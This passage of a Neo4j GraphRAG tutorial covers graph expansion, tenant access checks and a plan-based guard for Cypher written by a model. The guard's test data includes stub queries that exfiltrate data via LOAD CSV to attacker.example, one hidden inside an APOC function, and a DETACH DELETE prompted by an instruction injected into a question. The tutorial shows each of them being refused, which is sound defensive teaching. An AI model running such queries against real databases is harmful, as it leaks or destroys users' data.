Filters inside the search. Since 2026.01 a vector index can carry extra properties for filtering (CREATE VECTOR INDEX ... ON c.embedding WITH [c.tenant]), and SEARCH c IN (VECTOR INDEX ... FOR $q WHERE c.tenant = $tenant LIMIT 5) applies the filter inside the search. Filtering on a property you did not declare fails with an error. Tenant and access filters must fail closed, as taught in Metadata & Filtering.
Your turn. The index is approximate, and it uses binary quantization. How do you measure its ANN recall@3 on your own chunks without leaving Cypher?
Check your answer
Compute the exact top 3 with a full scan and compare the two lists:
EXACT = """
MATCH (c:Chunk)
RETURN c.id AS id, round(vector.similarity.cosine(c.embedding, $q), 3) AS score
ORDER BY score DESC LIMIT $k
"""
exact, _, _ = driver.execute_query(EXACT, q=q, k=3, routing_=RoutingControl.READ)
approx, _, _ = driver.execute_query(SEARCH, q=q, k=3, routing_=RoutingControl.READ)
print(len({r["id"] for r in exact} & {r["id"] for r in approx}) / 3)
1.0
vector.similarity.cosine uses the same 0-to-1 scale as the index. Ten chunks prove nothing; run this over a few hundred real queries at your real corpus size, and compare the numbers with and without quantization. This is ANN recall (agreement with exact search). Whether the chunks are the right ones is retrieval recall, which needs labeled queries (Retrieval Metrics).
Move 4: From anchor to answer
Symptom: the vector search finds the bulletin, and the bikes are still not in the prompt.
The combination is two steps in one query. Vector search picks anchor chunks, and a graph pattern expands from each anchor. The first version most tutorials show expands generically: every fact within one hop of anything the anchor mentions.
EXPAND = """
MATCH (c:Chunk)
SEARCH c IN (VECTOR INDEX chunk_embedding FOR $q LIMIT $k)
SCORE AS score
CALL (c) {
OPTIONAL MATCH (c)-[:MENTIONS]->(e)-[r:HAS_PART|SUPPLIED_BY|COVERS]-()
RETURN collect(DISTINCT startNode(r).name + " " + type(r) + " " + endNode(r).name) AS facts
}
RETURN c.id AS id, round(score, 3) AS score, facts
"""
records, _, _ = driver.execute_query(EXPAND, q=q, k=3, routing_=RoutingControl.READ)
for r in records:
print(r["id"], r["score"], len(r["facts"]))
for fact in sorted(r["facts"]):
print(" ", fact)
sb-2026-07#v1#0 0.885 6
BC-310 SUPPLIED_BY Kestrel Components
BC-420 SUPPLIED_BY Kestrel Components
BK-7 HAS_PART BC-310
BL-20 SUPPLIED_BY Kestrel Components
City 3 HAS_PART BC-310
SB-2026-07 COVERS BC-310
kestrel#v1#0 0.77 8
BC-310 SUPPLIED_BY Kestrel Components
BC-420 SUPPLIED_BY Kestrel Components
BK-7 HAS_PART BC-310
BK-7 HAS_PART BL-20
BL-20 SUPPLIED_BY Kestrel Components
Cargo 2 HAS_PART BC-420
City 3 HAS_PART BC-310
SB-2026-07 COVERS BC-310
bk-7#v1#0 0.746 7
BC-310 SUPPLIED_BY Kestrel Components
BK-7 HAS_PART BC-310
BK-7 HAS_PART BL-20
BL-20 SUPPLIED_BY Kestrel Components
City 3 HAS_PART BC-310
SB-2026-07 COVERS BC-310
Trail 5 HAS_PART BK-7
CALL (c) { ... } runs the subquery once per anchor, and the OPTIONAL MATCH keeps an anchor that has no facts. Everything the answer needs is now in the prompt: City 3 uses BC-310, and Trail 5 uses BK-7, which contains BC-310. There are three problems:
- 21 fact lines hold 9 distinct facts. Anchors overlap, so deduplicate across anchors before building the prompt.
Cargo 2 HAS_PART BC-420sits next toBC-420 SUPPLIED_BY Kestrel Components. That is the same temptation the top-5 prompt had.- The model must do the join itself: Trail 5 β BK-7 β BC-310, across two facts listed apart. Each join the model does is a chance to get it wrong.
When you know the shape of the question ("what does this bulletin affect?"), let the database do the join:
EXPAND_AFFECTED = """
MATCH (c:Chunk)
SEARCH c IN (VECTOR INDEX chunk_embedding FOR $q LIMIT $k)
SCORE AS score
CALL (c) {
OPTIONAL MATCH (c)-[:MENTIONS]->(:Bulletin)-[:COVERS]->(p:Part)
OPTIONAL MATCH path = (b:Bike)-[:HAS_PART*1..3]->(p)
RETURN collect(DISTINCT CASE WHEN path IS NOT NULL THEN
{names: [n IN nodes(path) | n.name],
sources: reduce(acc = [], r IN relationships(path) | acc + r.sources)} END) AS paths
}
RETURN c.id AS id, round(score, 3) AS score, paths
"""
records, _, _ = driver.execute_query(EXPAND_AFFECTED, q=q, k=3, routing_=RoutingControl.READ)
for r in records:
print(r["id"], r["score"], [(" > ".join(p["names"]), p["sources"]) for p in r["paths"]])
Predict: which anchors get paths, and which chunk ids appear as sources?
Check your answer
sb-2026-07#v1#0 0.885 [('City 3 > BC-310', ['city-3#v1#0']), ('Trail 5 > BK-7 > BC-310', ['trail-5#v1#0', 'bk-7#v1#0'])]
kestrel#v1#0 0.77 []
bk-7#v1#0 0.746 []
Only the bulletin chunk mentions a Bulletin, so only it expands. The sources include the spec sheets of City 3 and Trail 5, which ranked 5th and 7th in the opening search and never made the top 3. The answer can now cite them: "City 3 [city-3#v1#0] and Trail 5, through brake kit BK-7 [trail-5#v1#0][bk-7#v1#0], are affected by SB-2026-07 [sb-2026-07#v1#0]."
Why it works. The vector index finds where the question lives in the text. The graph adds facts that the question never mentions and that no top-k list would rank. Provenance turns every graph fact back into citable text. The prompt carries the facts and their chunk ids, not the chunks' text; if the answer must quote the spec sheets, fetch those chunks too, at the price of more tokens.
| Expansion | Good for | Costs |
|---|---|---|
| Generic: facts within one or two hops of the anchor's entities | Questions you did not anticipate | Noise and duplicates; the model must do joins; size grows with node degree |
| Targeted: one path pattern per question shape | Known, frequent shapes (recalls, ownership, dependencies) | One query to write, test and route to per shape |
Most systems use both: route recognised shapes to targeted queries, use generic expansion as the fallback, and send counting and listing questions to Move 6. Routing is the same move as in Agentic RAG Systems, where a hop that repeats every day becomes stored data.
β οΈ Expansion cannot rescue a missed anchor. If the bulletin chunk is not among the anchors, the targeted query returns nothing and the generic one expands the wrong neighbourhood. That is the first-stage recall problem again: measure how often the right anchor is in the top k on labeled questions, and add lexical search or an exact lookup when identifiers matter (Move 5 covers Neo4j's full-text side).
The lever that 150 bikes use
The rental department imports its fleet: 150 bikes that all use the BL-20 brake lever. Watch what the generic expansion does:
fleet = [("Bike", f"Fleet {i:03d}", "HAS_PART", "Part", "BL-20") for i in range(1, 151)]
load_facts(fleet, source="fleet-import") # 150 rental bikes that all use the BL-20 lever
def total_db_hits(plan):
return plan.get("dbHits", 0) + sum(total_db_hits(c) for c in plan.get("children", []))
def facts_and_hits(query, **params):
records, summary, _ = driver.execute_query("PROFILE " + query, q=q, k=3, **params)
return sum(len(r["facts"]) for r in records), total_db_hits(summary.profile)
print("uncapped:", facts_and_hits(EXPAND))
uncapped: (321, 1371)
Two of the three anchors mention BL-20, so each pulls in 150 fleet facts: 21 + 2 Γ 150 = 321 lines, for the same question as before. BL-20 is now a supernode (a node with far more relationships than its neighbours). Every pattern that passes through it multiplies the work, which shows up in database hits (PROFILE counts them per operator) and, on real data, in p95 latency. The fix has two parts: do not expand through hubs, and cap what each anchor contributes.
EXPAND_CAPPED = """
MATCH (c:Chunk)
SEARCH c IN (VECTOR INDEX chunk_embedding FOR $q LIMIT $k)
SCORE AS score
CALL (c) {
OPTIONAL MATCH (c)-[:MENTIONS]->(e)
WHERE COUNT { (e)--() } <= $max_degree // do not expand through hubs
OPTIONAL MATCH (e)-[r:HAS_PART|SUPPLIED_BY|COVERS]-()
WITH DISTINCT r LIMIT $max_facts // hard cap per anchor
RETURN collect(startNode(r).name + " " + type(r) + " " + endNode(r).name) AS facts
}
RETURN c.id AS id, round(score, 3) AS score, facts
"""
print("capped: ", facts_and_hits(EXPAND_CAPPED, max_degree=50, max_facts=20))
capped: (19, 142)
From 321 lines and 1,371 database hits down to 19 lines and 142 hits. What it cost: the two facts reachable only through BL-20 (BK-7 HAS_PART BL-20 for the supplier anchor, BL-20 SUPPLIED_BY Kestrel Components for the kit anchor) dropped out. Here neither matters. For "which bikes use the BL-20 lever?", the hub's neighbours are the answer, and that is a listing question for a targeted query or Move 6, not for neighbourhood expansion. LIMIT inside the subquery keeps whichever rows the planner produces first, so treat it as a safety valve and order explicitly when it binds often.
driver.execute_query("MATCH (b:Bike) WHERE b.name STARTS WITH 'Fleet ' DETACH DELETE b")
Measure it. Label 50β100 relational questions with their expected entity sets (the bikes for a recall, the parts of a kit). For each retrieval variant, record:
- answer-set recall and precision against the labels;
- whether every fact of each gold path reached the prompt (the graph version of the course's gold-in-prompt rate);
- facts and tokens per prompt;
- p95 latency and database hits of the retrieval query.
Compare generic and targeted expansion per question shape, and rerun the comparison whenever a bulk import adds hubs.
Filtering the anchors does not filter the graph
The company now also hosts the engineering wiki of Velo, a partner brand, on the same server. Velo's pages are for Velo's staff only, so every chunk gets a tenant field, and the vector index is rebuilt to filter on it inside the search, as in Move 3. A Velo spec sheet arrives, and our service manager asks the recall question again:
PARTNER = "Velo Nightrider (2027) spec sheet, not yet announced: steel frame, BC-310 calipers."
ingest("velo-nightrider", PARTNER, out([("Bike", "Velo Nightrider"), ("Part", "BC-310")],
[("Velo Nightrider", "HAS_PART", "BC-310")]))
# A real connector sets the tenant at ingestion, from the source's permissions.
driver.execute_query("MATCH (c:Chunk) SET c.tenant = CASE c.doc_id "
"WHEN 'velo-nightrider' THEN 'velo' ELSE 'ebike' END")
driver.execute_query("DROP INDEX chunk_embedding") # rebuild it with tenant as a filter
driver.execute_query("""
CREATE VECTOR INDEX chunk_embedding FOR (c:Chunk) ON c.embedding WITH [c.tenant]
OPTIONS {indexConfig: {`vector.dimensions`: 384, `vector.similarity_function`: 'cosine'}}""")
driver.execute_query("CALL db.awaitIndexes(60)")
# Move 4's targeted query with the tenant filter inside the search, and nothing else
ANCHORS_ONLY = EXPAND_AFFECTED.replace("LIMIT $k)", "WHERE c.tenant = $tenant LIMIT $k)")
records, _, _ = driver.execute_query(ANCHORS_ONLY, q=q, k=3, tenant="ebike",
routing_=RoutingControl.READ)
for r in records:
print(r["id"], r["score"], [(" > ".join(p["names"]), p["sources"]) for p in r["paths"]])
Predict: all three anchors are our own chunks. Can the partner's unannounced bike reach our prompt?
Check your answer
sb-2026-07#v1#0 0.885 [('City 3 > BC-310', ['city-3#v1#0']), ('Trail 5 > BK-7 > BC-310', ['trail-5#v1#0', 'bk-7#v1#0']), ('Velo Nightrider > BC-310', ['velo-nightrider#v1#0'])]
kestrel#v1#0 0.77 []
bk-7#v1#0 0.746 []
Yes. Entities are merged by name, so both tenants' facts meet at the one BC-310 node, and the expansion walks from our bulletin into a fact whose only source is Velo's spec sheet. Our recall answer would now name a bike we do not make, which Velo has not announced, and cite a chunk id that names Velo's document.
The graph is a derived copy of the documents, so a user may see a fact only if they may read a chunk that states it. Graph Rag sets that rule; here is the query that keeps it:
EXPAND_AFFECTED_ACL = """
MATCH (c:Chunk)
SEARCH c IN (VECTOR INDEX chunk_embedding FOR $q WHERE c.tenant = $tenant LIMIT $k)
SCORE AS score
CALL (c) {
OPTIONAL MATCH (c)-[:MENTIONS]->(:Bulletin)-[cover:COVERS]->(p:Part)
OPTIONAL MATCH path = (b:Bike)-[:HAS_PART*1..3]->(p)
WITH path, [r IN [cover] + relationships(path) | // for each fact the answer uses:
[s IN r.sources WHERE EXISTS { // its sources this user may read
MATCH (x:Chunk {id: s}) WHERE x.tenant = $tenant }]] AS readable
WHERE path IS NOT NULL AND all(ids IN readable WHERE ids <> [])
RETURN collect(DISTINCT {names: [n IN nodes(path) | n.name],
sources: reduce(acc = [], ids IN readable[1..] | acc + ids)}) AS paths
}
RETURN c.id AS id, round(score, 3) AS score, paths
"""
records, _, _ = driver.execute_query(EXPAND_AFFECTED_ACL, q=q, k=3, tenant="ebike",
routing_=RoutingControl.READ)
for r in records:
print(r["id"], r["score"], [(" > ".join(p["names"]), p["sources"]) for p in r["paths"]])
retract("velo-nightrider") # the partner's sheet leaves the demo again
sb-2026-07#v1#0 0.885 [('City 3 > BC-310', ['city-3#v1#0']), ('Trail 5 > BK-7 > BC-310', ['trail-5#v1#0', 'bk-7#v1#0'])]
kestrel#v1#0 0.77 []
bk-7#v1#0 0.746 []
The partner's bike is gone, and our two paths are unchanged. How the check works:
- Every fact needs a readable source.
readableholds, for theCOVERSfact and each fact on the path, the sources this user may read. A path survives only if every fact keeps at least one, and the citations list only those ([1..]leaves out theCOVERSfact, as Move 4's query did). When we let Velo's kit sheet also stateBK-7 HAS_PART BC-310, the Trail 5 path still came back for us, citing only our own chunks. A source that is not a chunk at all, such as the"fleet-import"batch, counts as unreadable: the check fails closed. - Permissions stay on the chunks. The query reads the tenant from each source's
Chunknode. When a document's readers change, you update its chunks, and every fact follows. Copying the tenant or groups onto each relationship makes the check cheaper, but then every permission change must be rewritten onto every fact the document supports. - Every expansion needs it. The generic and capped queries above, and the package's
retrieval_queryin Move 5, need the same condition.$tenantmust come from the verified login, never from the question text.
β οΈ A model that writes Cypher (Move 6) cannot be trusted to add this condition, so run generated queries only against a database that holds nothing the asking user may not read. Test the rule the way we just did: load a document for another tenant that states a fact next to yours, and check that no answer for your tenant contains it.
Move 5: The official package, and its contract
Symptom: you are about to write retrievers, prompt assembly and an extraction pipeline by hand.
Neo4j's first-party Python library is neo4j-graphrag (version 1.21.0, released 2026-09-23, Apache-2.0; source on GitHub). It is the renamed continuation of neo4j-genai, which is deprecated and has had no release since 0.6.0 in September 2024. Tutorials that import neo4j_genai are out of date.
Here is Move 4's targeted retriever, rewritten for the package:
from neo4j_graphrag.embeddings import SentenceTransformerEmbeddings
from neo4j_graphrag.generation import GraphRAG, RagTemplate
from neo4j_graphrag.llm import LLMInterfaceV2, LLMResponse
from neo4j_graphrag.retrievers import VectorCypherRetriever
from neo4j_graphrag.types import RetrieverResultItem
# Appended after the package's vector search, which leaves `node` and `score` in scope.
RETRIEVAL_QUERY = """
OPTIONAL MATCH (node)-[:MENTIONS]->(:Bulletin)-[:COVERS]->(p:Part)
OPTIONAL MATCH path = (b:Bike)-[:HAS_PART*1..3]->(p)
WITH node, score, collect(DISTINCT CASE WHEN path IS NOT NULL THEN
{names: [n IN nodes(path) | n.name],
sources: reduce(acc = [], r IN relationships(path) | acc + r.sources)} END) AS paths
RETURN node.id AS id, node.text AS text, paths, score
"""
def as_context(record):
lines = [f"[{record['id']}] {record['text']}"]
lines += [f" graph: {' > '.join(p['names'])} [{', '.join(p['sources'])}]"
for p in record["paths"]]
return RetrieverResultItem(content="\n".join(lines), metadata={"score": record["score"]})
embedder = SentenceTransformerEmbeddings(model="sentence-transformers/all-MiniLM-L6-v2")
retriever = VectorCypherRetriever(driver, index_name="chunk_embedding",
retrieval_query=RETRIEVAL_QUERY, embedder=embedder,
result_formatter=as_context)
class PromptEcho(LLMInterfaceV2):
"""Stands in for a real model and keeps the messages, so you can read what it would see."""
def invoke(self, input, *, response_format=None, **kwargs):
self.messages = input
return LLMResponse(content="(a real model answers here)")
async def ainvoke(self, input, *, response_format=None, **kwargs):
return self.invoke(input)
llm = PromptEcho(model_name="stub")
template = RagTemplate(system_instructions=(
"Answer only from the context. Cite chunk ids in brackets. "
"If the context does not contain the answer, say what is missing."))
rag = GraphRAG(retriever=retriever, llm=llm, prompt_template=template)
result = rag.search(query_text=question, retriever_config={"top_k": 3}, return_context=True)
for message in llm.messages:
print(f"--- {message['role']}\n{message['content']}")
--- system
Answer only from the context. Cite chunk ids in brackets. If the context does not contain the answer, say what is missing.
--- user
Context:
[sb-2026-07#v1#0] Service bulletin SB-2026-07: Kestrel Components recalls brake caliper BC-310 (lots made in March 2026) because the piston seal can leak. Dealers must replace affected calipers before the bike is ridden again.
graph: City 3 > BC-310 [city-3#v1#0]
graph: Trail 5 > BK-7 > BC-310 [trail-5#v1#0, bk-7#v1#0]
[kestrel#v1#0] Supplier profile: Kestrel Components, Porto. Supplies our hydraulic brake calipers BC-310 and BC-420 and the brake lever BL-20.
[bk-7#v1#0] Brake kit BK-7: two BC-310 calipers, two BL-20 levers and 180 mm rotors.
Examples:
Question:
Which bikes are affected by the Kestrel brake caliper recall?
Answer:
The contract, read from the 1.21.0 source and checked against the server:
retrieval_queryis appended to the package's own vector search. On a 2026 server the package generatesCYPHER 25 MATCH (node:Chunk) SEARCH node IN (VECTOR INDEX ... LIMIT $top_k * $effective_search_ratio) SCORE AS score WITH node, score ORDER BY score DESC LIMIT $top_kand then your text. Start fromnodeandscore. Older tutorials writeWHERE anchor.id IN $node_ids. The package never supplies that parameter, so the query fails withNeo.ClientError.Statement.ParameterMissing: Expected parameter(s): node_ids.- Your query must be valid Cypher 25, because of that prefix.
- Without
result_formatter, each context item isstr(record). Write the formatter; it decides what the model reads. - The default
RagTemplatesays only "Answer the user question using the provided context." Nothing about citations or saying "not found". Set your own instructions, as above. How to lay out context for citations is covered in Context Augmentation. - For
GraphRAG, a custom model class can implementLLMInterfaceV2alone, asPromptEchodoes. The olderLLMInterfaceis deprecated and logs a warning. ButSimpleKGPipelinein 1.21.0 still type-checks forLLMInterface: our V2-only class raisedPipelineDefinitionErrorthere. A custom class used with the pipeline must subclass both, as the built-in classes such asAnthropicLLMdo, and it will log the deprecation warning. - Permissions are yours to add. In a shared graph, the source check from Move 4 goes into
retrieval_queryas well, with the tenant passed throughsearch(..., query_params={"tenant": ...}). Filtering the anchors is the harder half. In 1.21.0,search(filters={"tenant": ...})against our index declaredWITH [c.tenant]first logged thattenantwas "not declared as filterable" (the package looks for an index option that our server does not report), then raisedVector Search with filters requires: node_label, embedding_node_property, embedding_dimension. Until your version handles it, run Move 4's filtered query yourself.
The real model plugs in through the same parameter (this needs pip install "neo4j-graphrag[anthropic]" and an API key):
from neo4j_graphrag.llm import AnthropicLLM
MODEL = "claude-sonnet-5" # example id as of 2026-09; pick a current model
rag = GraphRAG(retriever=retriever, prompt_template=template,
llm=AnthropicLLM(model_name=MODEL, model_params={"max_tokens": 4000}))
print(rag.search(query_text=question, retriever_config={"top_k": 3}).answer)
The rest of the toolbox
| Component | What it does in 1.21.0 | Watch out for |
|---|---|---|
VectorRetriever |
Vector search only; returns node properties | No graph at all |
VectorCypherRetriever |
Vector search, then your Cypher from node |
The contract above |
HybridRetriever, HybridCypherRetriever |
Vector search plus a full-text (Lucene) index | Fusion divides each list's scores by its top score, then takes the maximum (naive) or alpha Β· vector + (1 β alpha) Β· full-text (linear; alpha weights the vector side, as in this course) |
Text2CypherRetriever |
A model writes Cypher; the package runs it | Move 6 |
SimpleKGPipeline (in neo4j_graphrag.experimental) |
Split, embed, extract with a schema, prune to the schema, write, resolve | See below |
Full-text and identifiers. Neo4j's full-text indexes use Lucene with the standard-no-stop-words analyzer by default, which splits BC-310 into bc and 310. On a small test index, the query BC-310 also matched a BC-420 chunk and a "310 Wh" battery chunk, while the phrase query "BC-310" matched only the two right chunks. For exact identifiers, look the entity up by key (MATCH (p:Part {name: $code})) instead. Lexical scoring itself is taught in Sparse vs Dense Retrieval.
SimpleKGPipeline is the packaged version of Move 2. It writes a lexical graph (Document and Chunk nodes joined by FROM_DOCUMENT and NEXT_CHUNK) plus the entities, each linked to its chunk by FROM_CHUNK. It then merges entities that have the same label and the same name, using APOC, across every __Entity__ node in the database (the resolver component takes a filter query, but SimpleKGPipeline does not expose it). We ran it twice on the same text with a stub model. The entities were merged, and the run left two Document and two Chunk nodes, because it creates them fresh on every run. Exact-name resolution also leaves BC310 and Kestrel as separate nodes. So the pipeline saves you the plumbing, while stable ids, retraction on update and the gold-set check stay your job.
Frameworks. LangChain's langchain-neo4j (0.10.0) and LlamaIndex also wrap Neo4j. One detail is telling: LangChain's GraphCypherQAChain refuses to start unless you pass allow_dangerous_requests=True, and its docs tell you to give it narrowly scoped database credentials. The next move is about what "narrowly scoped" means when your edition has no roles.
Move 6: Let the model write Cypher, inside a fence
Symptom: users ask questions no retrieval query anticipated. "How many bikes use a Kestrel part?" "Which parts are in two or more kits?" Top-k cannot count, and expansion cannot enumerate.
Text-to-Cypher gives a model the schema and asks it to write the query. It is powerful and dangerous for the same reason: the model writes code that runs against your database, and its input includes user text and possibly retrieved text. The same idea over SQL, with the same risks, is covered in Vectorless RAG.
What can go wrong, and the fence for each:
| Risk | Example | Fence |
|---|---|---|
| Writes | A question that says "and delete that bulletin" | Read-only transactions; refuse non-read query types |
| Reads that leave the database | LOAD CSV FROM 'https://β¦', apoc.load.json, an APOC function that runs Cypher |
Allow only the plan operators and functions you need; load only the APOC parts you use; block the database server's outbound network |
| Admin commands | SHOW TRANSACTIONS, TERMINATE TRANSACTIONS |
The same operator allow-list, because both plan as read queries |
| Runaway queries | [:HAS_PART*] over a big bill of materials; a deeply nested expression |
A length cap, bounded path lengths, a server-side timeout, a row cap while streaming, a memory limit per transaction |
| Invented schema | [:USES_PART], which does not exist |
Schema in the prompt; refuse unknown labels and types |
| Values pasted into the query | A name containing a quote character | Values go in parameters, never in the query text |
Two facts about the edition shape this design. Read-only transactions work in Community. A write inside execute_read, or inside execute_query(..., routing_=RoutingControl.READ), fails with Neo.ClientError.Statement.AccessMode: Writing in read access mode not allowed; we checked both against the local server. Community has no role-based access control. SHOW ROLES fails with "not supported in community edition". So you cannot create a read-only database user; Enterprise Edition can. And a read-only transaction fences writes, nothing else. Run against our server inside a read transaction, LOAD CSV FROM a URL and apoc.load.json both tried to fetch it, and TERMINATE TRANSACTIONS ran (we gave it a transaction id that did not exist). EXPLAIN reports all three as query type r.
So check the plan before you run anything, and list what you allow, not what you fear:
from itertools import islice
from neo4j import READ_ACCESS, unit_of_work
from neo4j.exceptions import Neo4jError
SCHEMA_PROMPT = """Write one read-only Cypher query for this Neo4j graph. Return JSON:
{"cypher": "...", "params": {...}}. Put every value from the question in params.
Nodes: (:Bike {name}), (:Part {name}), (:Supplier {name}), (:Bulletin {name})
Relationships: (:Bike)-[:HAS_PART]->(:Part), (:Part)-[:HAS_PART]->(:Part),
(:Part)-[:SUPPLIED_BY]->(:Supplier), (:Bulletin)-[:COVERS]->(:Part)
Kits nest: a bike reaches its parts through (:Bike)-[:HAS_PART*1..3]->(:Part)."""
UNKNOWN = {"01N50": "unknown label", "01N51": "unknown relationship type",
"01N52": "unknown property"}
MAX_CHARS, MAX_HOPS, MAX_ROWS = 500, 3, 50
ALLOWED = { # the read operators our labeled test questions need; anything else is refused
"ProduceResults", "Projection", "Filter", "Distinct", "Sort", "Top", "Limit", "Skip",
"EagerAggregation", "Unwind", "Apply", "SemiApply", "AntiSemiApply", "Argument",
"CacheProperties", "Union", "NodeByLabelScan", "NodeIndexScan", "NodeIndexSeek",
"NodeUniqueIndexSeek", "NodeUniqueIndexSeekByRange", "DirectedRelationshipTypeScan",
"Expand", "OptionalExpand", "VarLengthExpand"}
NAMESPACED_CALL = re.compile(r"\b[A-Za-z_]\w*(?:\.\w+)+(?=\()") # apoc.x.y(...), db.x(...)
def plan_operators(plan):
yield plan["operatorType"].split("@")[0].split("(")[0], plan.get("args", {}).get("Details", "")
for child in plan.get("children", []):
yield from plan_operators(child)
def check(cypher, params):
"""Plan the query without running it, and list every reason to refuse it."""
if len(cypher) > MAX_CHARS:
return [f"longer than {MAX_CHARS} characters"]
try:
_, summary, _ = driver.execute_query("EXPLAIN " + cypher, params,
routing_=RoutingControl.READ)
except Neo4jError as e: # syntax errors, two statements, admin commands
return [f"does not plan ({e.code})"]
if summary.query_type != "r":
return [f"not read-only (query type {summary.query_type!r})"]
problems = [UNKNOWN[s.gql_status] for s in summary.gql_status_objects
if s.gql_status in UNKNOWN]
for op, details in plan_operators(summary.plan):
if op not in ALLOWED:
problems.append(f"operator {op} is not allowed")
problems += [f"function {f} is not allowed" for f in NAMESPACED_CALL.findall(details)]
if op == "VarLengthExpand":
m = re.search(r"\*(\d*)(\.\.)?(\d*)\]", details) # *2, *..3, *1..3, *, *0..
upper = (m[3] if m[2] else m[1]) if m else ""
if not upper or int(upper) > MAX_HOPS:
problems.append(f"path length not bounded by {MAX_HOPS}")
return list(dict.fromkeys(problems))
@unit_of_work(timeout=2.0) # the server stops the query after 2 s
def first_rows(tx, cypher, params):
rows = [r.data() for r in islice(tx.run(cypher, params), MAX_ROWS + 1)]
return rows[:MAX_ROWS], len(rows) > MAX_ROWS # stop reading; the rest is discarded
def run_generated(generated):
problems = check(generated["cypher"], generated["params"])
if problems:
return "REFUSED: " + "; ".join(problems)
with driver.session(default_access_mode=READ_ACCESS, fetch_size=MAX_ROWS + 1) as session:
try:
rows, more = session.execute_read(first_rows, generated["cypher"],
generated["params"])
except Neo4jError as e: # timeout, memory limit, runtime error
return f"FAILED: {e.code}"
return rows + ([f"(only the first {MAX_ROWS} rows are shown)"] if more else [])
EXPLAIN plans a query without executing it. The plan tells you the query type (r, w, rw or s for schema), the operators it would run with the expressions each one evaluates, and warnings with GQL status codes for labels, relationship types and properties the database has never seen. The real generator is the same structured-output call as the extraction in Move 2, with a {"cypher", "params"} schema and SCHEMA_PROMPT plus the question as input. Here are six outputs a model could plausibly return:
GENERATED = [ # what a model returned for six questions (a stub; see the real call above)
{"cypher": "MATCH (:Bulletin {name: $b})-[:COVERS]->(:Part)<-[:HAS_PART*1..3]-(k:Bike) "
"RETURN DISTINCT k.name AS bike ORDER BY bike", "params": {"b": "SB-2026-07"}},
{"cypher": "MATCH (k:Bike)-[:USES_PART]->(:Part {name: $p}) RETURN k.name AS bike",
"params": {"p": "BC-310"}},
{"cypher": "MATCH (b:Bulletin {name: $b}) DETACH DELETE b", "params": {"b": "SB-2026-07"}},
{"cypher": "LOAD CSV FROM 'https://attacker.example/c?b=' + $b AS row RETURN row",
"params": {"b": "SB-2026-07"}},
{"cypher": "MATCH (b:Bulletin {name: $b}) RETURN apoc.cypher.runFirstColumnSingle("
"\"LOAD CSV FROM 'https://attacker.example/c?b=' + $n AS r RETURN r\", "
"{n: b.name}) AS x", "params": {"b": "SB-2026-07"}},
{"cypher": "MATCH (k:Bike)-[:HAS_PART*]->(p:Part) RETURN k.name AS bike, count(p) AS parts",
"params": {}},
]
for generated in GENERATED:
print(run_generated(generated))
Predict which of the six run, before you look.
Check your answer
[{'bike': 'City 3'}, {'bike': 'Trail 5'}]
REFUSED: unknown relationship type
REFUSED: not read-only (query type 'w')
REFUSED: operator LoadCSV is not allowed
REFUSED: function apoc.cypher.runFirstColumnSingle is not allowed
REFUSED: path length not bounded by 3
Only the first runs. The second is the most dangerous in practice because it looks harmless: run without the check, it returns an empty list, and the model says "no bike uses BC-310". The third came from a question that contained an instruction; the read-only transaction would have blocked it anyway, and the plan check refuses it before it gets that far. The fourth would pass any check that looks only at the query type.
The fifth is the reason for an allow-list. apoc.cypher.runFirstColumnSingle is a function, not a procedure, so its plan has no ProcedureCall and no LoadCSV: the LOAD CSV hides inside a string that the function runs, with the bulletin's name in the URL. An earlier version of this guard refused LoadCSV and ProcedureCall by name, and it let this kind of query through. With a closed local port in place of the attacker's URL, the server tried the fetch and got "Connection refused".
How each part of the guard earned its place, from 65 hostile or tricky queries we ran against it:
- The length cap. Deep nesting made our server fail without answering. A list nested 350 levels deep (about 700 characters) left the driver waiting 120 s before it gave up with
ServiceUnavailable; there was no plan and no error to refuse on. Our test questions need queries of under 200 characters, so a 500-character cap costs nothing. - Refusing whatever does not plan. Two statements in one string, a
PROFILEprefix and aUSE systemadmin command all fail atEXPLAINwith an error. Without thetry, the check crashes instead of refusing. - The operator allow-list. A deny-list has to know every dangerous operator in advance. We found
ShowTransactions,TerminateTransactionsandShowSettings(all query typer),ShortestPathandStatefulShortestPathforshortestPath(...)andSHORTEST 1with unbounded paths,Repeatfor a quantified path pattern with aWHEREinside, andAllNodesScanfor a label-freeMATCH (n), which returned whole chunk nodes, embeddings included. The allow-list refuses all of them because nobody added them. Start from the operators your labeled test questions need, and add one only when a test needs it. - The function check. It refuses every namespaced function in any operator's expressions, including
WHEREclauses andCOUNT { }subqueries. It also refuses harmless ones such asvector.similarity.cosine; allow those by name if your questions need them. - Streaming with a row cap.
execute_queryfetches every row before you can slice the list.first_rowsstops reading after 51 rows and the server discards the rest.UNWIND range(1, 100000000) AS i RETURN ireturned its first 50 rows in 0.03 s this way. Fetching everything first ran into the 2-s timeout. The last line tells the model that rows are missing, so a truncated list is not presented as complete.
What this fence does not do, and what covers it:
- The unknown-name warnings come from the database, not from your schema. A label that exists in the database but is off-limits (say
Employee) passes. If the graph holds anything the model must never read, keep it in a separate database. Community Edition has one user database per server, so in practice that means a separate server. The same holds for other tenants' or users' rows: a generated query can leave out any filter, so per-user scoping has to come from which database the query runs against. - A row cap is not a size cap, and a plan check is one layer.
collect()packed 300,000 numbers into a single row that passed every check, so cap the characters you pass to the model as well. On the server, setdb.memory.transaction.maxso one query cannot take the heap (memory configuration; our Community server lists it, set to 0, which means no per-transaction limit). Load only the procedures and functions you use withdbms.security.procedures.allowlist(securing extensions); our server loads all of APOC. Block the database server's outbound network, so a fetch the checks miss still goes nowhere. - An empty result is not a "no". Treat zero rows as "could not answer" unless the question is one where empty is a meaningful answer, and log it.
- A valid query can answer a different question. Build a labeled set of 50β100 questions with their expected results and measure execution accuracy: the share of questions where the generated query returns exactly the expected rows. Also track refusal and empty-result (zero-row) rates, and rerun the set whenever the model, prompt or schema changes. Keep the hostile queries as a second test set that must stay refused.
The package's version. Text2CypherRetriever in 1.21.0 runs EXPLAIN and refuses anything whose query type is not r (a stub model's DETACH DELETE raised Text2CypherRetrievalError: Refusing to execute non-read-only Cypher), then runs the query with read routing. It has no timeout, no row cap and no check for operators, functions or unknown names. A stub returning LOAD CSV FROM a local URL passed its check, and the server tried to fetch the URL. By default it also builds the schema for the prompt from the whole database using APOC. Pass neo4j_schema= with a curated description instead, and wrap it with checks like the ones above.
Move 7: Communities, and who may run them
Symptom: someone asks for the "main themes" across thousands of bulletins, or wants related entities grouped.
Community detection partitions a graph into groups of densely connected nodes. Microsoft's GraphRAG summarises such groups so it can answer questions about a whole corpus. That method, and when it is worth its indexing cost, is in Graph Rag. The hands-on question here is where to run the algorithm, and under which licence:
| Option (as of September 2026) | Licence | Notes |
|---|---|---|
